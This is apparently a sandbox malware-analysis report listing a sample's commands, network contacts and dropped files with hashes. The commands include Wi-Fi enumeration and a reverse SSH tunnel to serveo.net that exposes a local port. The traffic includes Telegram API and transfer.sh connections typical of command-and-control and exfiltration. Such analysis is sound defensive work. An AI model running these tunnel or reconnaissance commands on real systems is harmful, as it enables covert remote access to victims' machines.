C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\System32\OpenSSH\ssh.exe

"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8229 serveo.net

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
N/A 127.0.0.1:8229 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 31.214.89.159.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 232.200.77.51.in-addr.arpa udp
US 8.8.8.8:53 11.78.23.94.in-addr.arpa udp
US 8.8.8.8:53 175.238.145.217.in-addr.arpa udp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
N/A 127.0.0.1:8229 tcp
DE 159.89.214.31:22 serveo.net tcp
US 208.95.112.1:80 ip-api.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
DE 144.76.136.153:443 transfer.sh tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 10.73.50.20.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp

Files

memory/1304-0-0x000002A63AEF0000-0x000002A63AF14000-memory.dmp

memory/1304-3-0x00007FFD45B20000-0x00007FFD465E1000-memory.dmp

memory/1304-4-0x000002A655420000-0x000002A655430000-memory.dmp

memory/1304-6-0x00007FFD45B20000-0x00007FFD465E1000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Vfd663501e1ac13eb331505b8388e675450.exe.log

MD5 3308a84a40841fab7dfec198b3c31af7
SHA1 4e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256 169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA512 97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

memory/4244-11-0x00007FFD447E0000-0x00007FFD452A1000-memory.dmp

memory/4244-12-0x0000012C7CF50000-0x0000012C7CF60000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

memory/4244-16-0x00007FFD447E0000-0x00007FFD452A1000-memory.dmp

memory/2596-17-0x00007FFD447E0000-0x00007FFD452A1000-memory.dmp

memory/2596-18-0x000001A131080000-0x000001A131090000-memory.dmp

C:\Users\Admin\AppData\Local\477mflh5px\port.dat

MD5 0396df57e78b6d04b6854dd682e27b3c
SHA1 67b3808fac79cbad380ff8550a72354870be5b73
SHA256 e9297a9f26942ce6d80b40dd566c86ee7ae4918109c50bdd306730ab5139e011
SHA512 ecc5b805d9039f6c9694ca59fd56c47c7cc27e8a6eafcfca4f1a95c5f0d2268d4dce3ee4b66444cd76fdd20c17e63ffed2e23da1dab8c8c05957e36f3d1c80e0

memory/4244-20-0x0000012C7CF50000-0x0000012C7CF60000-memory.dmp

C:\Users\Admin\.ssh\known_hosts

MD5 2ba3694520311cffb8e5d96217fd28f2
SHA1 7ed0af02238d6b1ce5becd6bdadbb85dca1b2a83
SHA256 121df228d77537d6043cb474e996d2b7279156ac540762e6cf1c0b35a378b626
SHA512 83536222c4dd6f326198b9681a0e7a4d44307648a2b4905a504e2c3f8e6113a79ec1d75adb160d77a107f3f0c5efe0a094e45aba2c29efa9e3e46f7e6cb17a7c

memory/2596-22-0x00007FFD447E0000-0x00007FFD452A1000-memory.dmp

memory/2596-23-0x000001A131080000-0x000001A131090000-memory.dmp